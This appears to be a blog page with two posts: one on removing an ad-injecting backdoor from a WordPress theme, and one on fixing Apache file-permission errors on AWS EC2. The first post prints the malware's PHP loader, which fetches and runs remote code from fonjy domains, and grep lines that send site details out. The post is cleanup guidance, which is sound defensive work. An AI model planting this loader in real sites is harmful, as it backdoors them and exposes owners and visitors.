Code Optimization

Interesting things in software development and code optimization

PHP Theme and malware

Hello,


Today I have found a way to clean-up one of a PHP Theme that pops-up ads from time to time on your website.

so just in case anyone will look for the same problem solving - here what I did for it:

- in my case it created wp-tmp.php file under the theme folder so I searched for the file name inside of each file:

grep --include=*.php -rn . -e "wp-tmp.php"

it will show you something like that:

./wp-content/themes/betheme/functions.php:106:                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

./wp-content/themes/betheme/functions.php:108:                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {

./wp-content/themes/betheme/functions.php:109:                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);

./wp-content/themes/betheme/functions.php:110:                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {

./wp-content/themes/betheme/functions.php:111:                        @file_put_contents('wp-tmp.php', $tmpcontent);

./wp-content/themes/betheme/functions.php:123:                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

./wp-content/themes/betheme/functions.php:125:                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {

./wp-content/themes/betheme/functions.php:126:                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);

./wp-content/themes/betheme/functions.php:127:                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {

./wp-content/themes/betheme/functions.php:128:                        @file_put_contents('wp-tmp.php', $tmpcontent);

./wp-content/themes/betheme/functions.php:133:        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {

./wp-content/themes/betheme/functions.php:136:        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {

./wp-content/themes/betheme/functions.php:139:        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {

btw, do not forget to delete all wp-tmp.php files :)

- after that open the functions.php file and remove the following lines:

$wp_auth_key='ee10bb8873fd72fe5d1585ebddeeae7e';
        if (($tmpcontent = @file_get_contents("https://www.fonjy.cc/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.fonjy.cc/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("https://www.fonjy.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
           
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif (($tmpcontent = @file_get_contents("https://www.fonjy.top/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.fonjy.top/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        }

in my case it was starting on 101 line number.

- now run the following command:
grep --include=*.php -rn . -e "fonjy"
and you should get something similar to:
./wp-includes/wp-vcd.php:83:						$content = @file_get_contents('https://www.fonjy.cc/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);

./wp-includes/wp-vcd.php:84:						@file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('https://www.fonjy.cc/admin.txt'));

./wp-includes/wp-vcd.php:88:						$content = @file_get_contents('https://www.fonjy.cc/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);

./wp-includes/wp-vcd.php:89:						@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('https://www.fonjy.cc/admin.txt'));

I removed the wp-vcd.php file completely and the class.wp.php as well (even it was in 0 size)


Now it should not return back to you website anymore (do not forget to remove 777 permission everywhere)


Thank you for reading it and see you

1vqHSTrq1GEoEF7QsL8dhmJfRMDVxhv2y



AWS, WordPress and File Uploading issue

Some time ago I had a need to modify some small things here and there under WordPress that was deployed under AWS EC2 instance.

As I had never worked with PHP, AWS and WordPress it was just simple step-by-step steps that I did take to get its done.

At some point when i started uploading images I faced with the error like:

The uploaded file could not be moved to wp-content/uploads/2019/02

Sure, it was not hard to understand that something wrong with permissions, access, folders, files, etc. But where and why? Do not forget I had never worked with all of that before.

I did try everything I knew on that time about it but with no luck.

I did google and try to gather everything by pieces, I also did contact AWS support and they did help me a lot as well.

This was due to a permissions/ownership problem. 

Apache httpd serves files that are kept in a directory called the Apache document root. The Amazon Linux Apache document root was /var/www/html, which by default was owned by root.

Below is an example on how to modify the ownership and permissions of this directory. In this example my user was ec2-user but it may be different in your environment. You would replace ec2-user with whatever your user is.

To allow the ec2-user account to manipulate files in this directory, you must modify the ownership and permissions of the directory. There are many ways to accomplish this task. Here we will add ec2-user to the apache group, to give the apache group ownership of the /var/www directory and assign write permissions to the group.


So finally here are steps that did solve my problem with file uploading:



1. Add your user (in this case, ec2-user) to the apache group. [ec2-user ~]$ sudo usermod -a -G apache ec2-user 
 2.Log out and then log back in again to pick up the new group, and then verify your membership. 
                    a. Log out (use the exit command or close the terminal window): [ec2-user ~]$ exit 
                    b. To verify your membership in the apache group, reconnect to your instance, and then run the following command: [ec2-user ~]$ groups ec2-user adm wheel apache systemd-journal 
 3. Change the group ownership of /var/www and its contents to the apache group. [ec2-user ~]$ sudo chown -R ec2-user:apache /var/www 
 4. To add group write permissions and to set the group ID on future subdirectories, change the directory permissions of /var/www and its subdirectories. [ec2-user ~]$ sudo chmod 2775 /var/www && find /var/www -type d -exec sudo chmod 2775 {} \; 
 5. To add group write permissions, recursively change the file permissions of /var/www and its subdirectories: [ec2-user ~]$ find /var/www -type f -exec sudo chmod 0664 {} \;


Now, ec2-user (and any future members of the apache group) can add, delete, and edit files in the Apache document root, enabling you to add content, such as a static website or a PHP application.


I have to mention that this did not solve my problem with plugin updating

An error occurred while updating Akismet Anti-Spam: Could not create directory


but this is different story and hopefully we will see solution as well :)


Thank you


1vqHSTrq1GEoEF7QsL8dhmJfRMDVxhv2y